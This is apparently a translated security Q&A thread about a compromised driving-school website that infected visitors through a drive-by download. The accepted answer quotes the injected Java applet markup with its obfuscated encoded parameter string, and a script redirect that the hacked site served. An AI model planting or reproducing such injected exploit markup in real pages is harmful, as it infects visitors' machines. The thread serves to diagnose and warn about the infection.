¿Dónde está el virus en este sitio web?

Question

¿Dónde está el virus en este sitio web?

#1 de that guy from over there (4 votos)

2

Hice que mi amigo fuera a este sitio web e inmediatamente infectó su máquina con malware (AntiVirus SecurityPro). Sucedió solo por ir a la portada. Parecía que el malware se había iniciado, pero que Microsoft Security Essentials lo reconoció rápidamente y se ofreció a eliminarlo. Tomó varios reinicios antes de que fuera eliminado por completo. De hecho, lo intentamos de nuevo y sucedió nuevamente con este sitio web específico.

Me gustaría advertir al propietario de la página, y también tengo curiosidad, así que intenté reproducirla en una máquina virtual, pero fue en vano. No tengo el mismo comportamiento y ninguna infección por lo que puedo decir.

Su máquina es un Windows 7SP1 y estaba usando IE y, por supuesto, eso es lo que intenté usar en la VM, pero no funcionó. Sospecho que puede depender de algún complemento especial en su máquina, tal vez una versión obsoleta de flash. Pero si inspecciono el contenido en Chrome, usando la consola de desarrolladores, no veo que la página muestre ningún flash. Pero podría ser esto solo sucede si el servidor reconoce que el cliente es vulnerable. ¿Alguien puede recomendar un buen escáner de sitio web?

La URL es la siguiente. Debes reemplazar XX en la siguiente página por dk. Hice esto para evitar que las personas que hacen clic inadvertidamente se infecten:

[ADVERTENCIA MALWARE] http://www.alliance-trafikskole.XX/

Gracias de antemano.

malware virus webserver

pregunta Morty 08.09.2013 - 09:19

fuente

1 respuesta

Lea otras preguntas en las etiquetas malware virus webserver

OpenSSL: habilita conjuntos de cifrado por versión de protocolo Lista de verificación de seguridad del servicio web - Seguimiento y depuración

score 4 · Accepted Answer

Puedes verlo cuando navegas desde la consola; Sin embargo, encontré que este malware se esconde de alguna manera; Mientras se verifica con algunos escáneres conocidos, como sucuri, no se encuentra nada. Si usted es el propietario de este sitio web, compruebo el código fuente.

El malware: se encuentra al principio del enlace / archivo y parece un drive-by-exploit; vea este pastebin para obtener más información.

Revisé el enlace correspondiente y parece un java-exploit

<p><applet  archive="IbFGkXLx.jar"  code="GPCwolGqNI.class"  width="24"  height="8">
<param value="65LLRIZ-68LLRYZ-68LLRIZ-64LLRYZ-5aLLRIZ-6fLLRYZ-68LLRIZ-62LLRYZ-5dLLRIZ-5eLLRYZ-5dLLRIZ-27LLRYZ-5bLLRIZ-62LLRYZ-73LLRIZ-33LLRYZ-30LLRIZ-30LLRYZ-2fLLRIZ-2aLLRYZ-28LLRIZ-70LLRYZ-62LLRIZ-67LLRYZ-5dLLRIZ-68LLRYZ-70LLRIZ-6cLLRYZ-27LLRIZ-69LLRYZ-61LLRIZ-69LLRYZ-38LLRIZ-66LLRYZ-5eLLRIZ-5dLLRYZ-62LLRIZ-5aLLRYZ-36LLRIZ-31LLRYZ-1fLLRIZ-5dLLRYZ-5eLLRIZ-66LLRYZ-68LLRIZ-36LLRYZ-2dLLRIZ-31LLRYZ-32LLRIZ-1fLLRYZ-5eLLRIZ-5dLLRYZ-62LLRIZ-6dLLRYZ-68LLRIZ-6bLLRYZ-62LLRIZ-5aLLRYZ-65LLRIZ-36LLRYZ-2dLLRIZ-1fLLRYZ-67LLRIZ-5eLLRYZ-70LLRIZ-6cLLRYZ-36LLRIZ-2eLLRYZ-2aLLRIZ-2cLLRYZ-1fLLRIZ-5cLLRYZ-5aLLRIZ-66LLRYZ-69LLRIZ-5aLLRYZ-62LLRIZ-60LLRYZ-67LLRIZ-36LLRYZ-2aLLRIZ-30LLRYZ-2aLLRIZ-1fLLRYZ-5aLLRIZ-69LLRYZ-69LLRIZ-6cLLRYZ-36LLRIZ-2eLLRYZ-32LLRIZ-1fLLRYZ-6cLLRIZ-64LLRYZ-62LLRIZ-67LLRYZ-36LLRIZ-2fLLRYZ-2eLLRIZ-2eLLRYZ-1fLLRIZ-69LLRYZ-5aLLRIZ-60LLRYZ-5eLLRIZ-36LLRYZ-30LLRIZ-2bLLRYZ-32LLRIZ-1fLLRYZ-60LLRIZ-5aLLRYZ-66LLRIZ-5eLLRYZ-36LLRIZ-2cLLRYZ-29LLRIZ-2fLLRYZ-" name="WaKnezleM" />

Cómo llegó

.. bueno, Joomla ....

10:40 UTC:

El IFrame malicioso se ha ido de traficskole; o bien se ha limpiado o el malware es algo "inteligente".

Esto es interesante; Cuando verifico itunes.php en este momento, recupero lo siguiente:

<html><script>location.replace("http:a.com");</script></html>